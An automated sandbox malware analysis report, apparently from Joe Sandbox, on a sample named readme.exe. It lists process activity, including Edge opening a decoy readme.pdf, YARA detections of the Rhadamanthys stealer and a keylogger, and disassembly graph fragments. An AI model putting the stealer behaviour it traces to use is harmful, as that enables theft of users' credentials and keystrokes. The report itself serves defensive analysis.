                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\readme.pdf
                                                                                                                                                                                                        Imagebase:0x7ff7fb980000
                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                        Start time:07:53:13
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                        Start time:07:53:13
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate "C:\Users\user~1\AppData\Local\Temp\readme.pdf"
                                                                                                                                                                                                        Imagebase:0x7ff7fb980000
                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                        Start time:07:53:14
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:3
                                                                                                                                                                                                        Imagebase:0x7ff7fb980000
                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                        Start time:07:53:20
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\readme.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user~1\AppData\Local\Temp\readme.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:2'764'800 bytes
                                                                                                                                                                                                        MD5 hash:1C0B92098975DC116DE9C0595D347882
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 21%, ReversingLabs
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                        Start time:07:53:20
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6456 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff7fb980000
                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                        Start time:07:53:20
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6944 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff7fb980000
                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                        Start time:07:53:21
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7336 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:6
                                                                                                                                                                                                        Imagebase:0x7ff7fb980000
                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                        Start time:09:40:28
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\readme.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user~1\AppData\Local\Temp\readme.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:2'764'800 bytes
                                                                                                                                                                                                        MD5 hash:1C0B92098975DC116DE9C0595D347882
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000017.00000003.1618499894.0000000000A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000017.00000002.1634336997.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.1623131121.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.1623575797.0000000003170000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                        Start time:09:40:30
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                        Imagebase:0xcd0000
                                                                                                                                                                                                        File size:676'584 bytes
                                                                                                                                                                                                        MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.1631623482.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000002.1731697999.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.1625239698.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.1631831483.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                        Start time:09:40:30
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 9148 -s 424
                                                                                                                                                                                                        Imagebase:0xd20000
                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                        Start time:09:40:40
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                        Imagebase:0x7ff6080a0000
                                                                                                                                                                                                        File size:827'408 bytes
                                                                                                                                                                                                        MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                        Start time:09:40:43
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 2032 -s 136
                                                                                                                                                                                                        Imagebase:0x7ff73ae10000
                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                        Start time:09:41:06
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=2432 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff7fb980000
                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Reset < >
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1506016596.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ffaac790000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                          • Instruction ID: 3f834428baee8514e242ae3e9d052343c894594efea0e7f7d70f7f19119c16da
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B401677115CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1506016596.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ffaac790000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 8,8$P/8$p08$-8$/8
                                                                                                                                                                                                          • API String ID: 0-3573041664
                                                                                                                                                                                                          • Opcode ID: ae7db18c42dfe4d87e2754025b2e1ef442964ad823d02cbecc769fa61d5c0221
                                                                                                                                                                                                          • Instruction ID: 8388387c96447fd9df3d3309fae0ab99dd96843fd4e7eeb2b1c25629187809b5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae7db18c42dfe4d87e2754025b2e1ef442964ad823d02cbecc769fa61d5c0221
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54317E8791F7C18FF79697A818250796FA1AF5721070D80FBE0DC8A1AB940E9D0C83D2

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:0%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                          Signature Coverage:7.8%
                                                                                                                                                                                                          Total number of Nodes:51
                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                          execution_graph 33916 42b640 45 API calls 33922 40de70 26 API calls 33837 424870 OpenClipboard GetClipboardData GetClipboardData GetClipboardData CloseClipboard 33925 417273 28 API calls 33926 420670 16 API calls 33929 4c9670 GetCurrentThreadId GetKeyboardLayout GetLocaleInfoA 33839 4dc870 EnterCriticalSection LeaveCriticalSection 33935 4275fe 16 API calls 33842 4d8000 EndDoc 33936 40d210 46 API calls 33846 4fc810 InitializeCriticalSection 33941 408220 14 API calls 33848 401031 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 33849 41d430 56 API calls 33950 4012c0 16 API calls 33953 40fad0 26 API calls 33852 4118d0 7 API calls 33854 4144de 34 API calls 33957 4086e0 19 API calls 33855 41d8e0 35 API calls 33856 4210e0 InterlockedCompareExchange Sleep InterlockedCompareExchange InterlockedExchange 33959 41bee8 19 API calls 33966 411a80 27 API calls 33967 40c290 QueryPerformanceCounter QueryPerformanceCounter 33867 427090 GetACP GetCPInfo 33869 401ca0 278 API calls 33970 40eaa0 28 API calls 33874 41b4b0 48 API calls 33973 41eab0 28 API calls 33979 4f9340 CoCreateInstance 33880 40d560 29 API calls 33982 417f61 29 API calls 33881 401170 12 API calls 33988 50af60 CoTaskMemAlloc 33826 4dc300 GetCommandLineA 33827 42c310 33826->33827 33886 40fd10 39 API calls 33823 44a710 33824 44a712 ExitProcess 33823->33824 33892 40d530 25 API calls 34000 41ef32 26 API calls 33893 40cdc0 17 API calls 34005 4ddfc0 64 API calls 34006 4263cc 18 API calls 33896 40d1d0 24 API calls 33898 41e5d0 GetSystemTime GetTimeZoneInformation 34007 42abd0 30 API calls 33902 41cde0 36 API calls 33905 412180 25 API calls 34014 4dd780 46 API calls 33908 428191 26 API calls

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 0 44a710-44a719 2 44a729 0->2 3 44a71b-44a727 0->3 4 44a73a-44a748 ExitProcess 2->4 3->4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0044A748
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 621844428-399585960
                                                                                                                                                                                                          • Opcode ID: 293620465462d170643fb551289f4f82b8ddd7fd95f4a21ffe41ffa866c1d984
                                                                                                                                                                                                          • Instruction ID: 4153d7d145e48ef0bfada68ad49838f97c765877aadb4e058581a2a78d09dbec
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 293620465462d170643fb551289f4f82b8ddd7fd95f4a21ffe41ffa866c1d984
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E04F75E4A25CCEEB30CA56EC017B8B775EB94316F0040EBD54D96241C6344D958F56

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 5 44a6e0-44a6fa 6 44a6fc-44a706 5->6 7 44a708 5->7 8 44a712-44a719 6->8 7->8 9 44a729 8->9 10 44a71b-44a727 8->10 11 44a73a-44a748 ExitProcess 9->11 10->11
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0044A748
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                          • Opcode ID: 301b0aacc8fca0e78445999e19763b72f532b71fd961c991c7f3581a4234fff3
                                                                                                                                                                                                          • Instruction ID: 1ceb8dd2f8bb3b7ec6cf47d3eabd97270618131fd29c238ba72ea5f4f3f95bef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 301b0aacc8fca0e78445999e19763b72f532b71fd961c991c7f3581a4234fff3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79F01C7494622DCEEF308F61C8457ACB7B0BB04315F1082EAC46D67780C3348E829F86

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 12 4dc300-4dc310 GetCommandLineA call 42c310
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CommandLine
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3253501508-0
                                                                                                                                                                                                          • Opcode ID: 04003b1c6e78a75645abe312a21659dec6fb72e0dd25253600e7555adc4d96f0
                                                                                                                                                                                                          • Instruction ID: 324ae4de550c7ee1837b525cc46cc1c53208b04041f71095fcaff5b360da8b69
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04003b1c6e78a75645abe312a21659dec6fb72e0dd25253600e7555adc4d96f0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51B012788003A00E83717B3834455CE7FF50C1D2E43844A58FCC1A3315D61488975AFA

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 14 4d7960-4d796e 15 4d7977-4d797a 14->15 16 4d7970-4d7976 14->16 17 4d797c-4d7984 15->17 18 4d7985-4d7995 LoadLibraryA 15->18 19 4d7ad8-4d7aeb 18->19 20 4d799b-4d7aac GetProcAddress * 19 18->20 20->19 22 4d7aae-4d7ab5 20->22 23 4d7ab7-4d7ab9 22->23 24 4d7ad2 22->24 23->24 25 4d7abb-4d7ad1 23->25 24->19
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
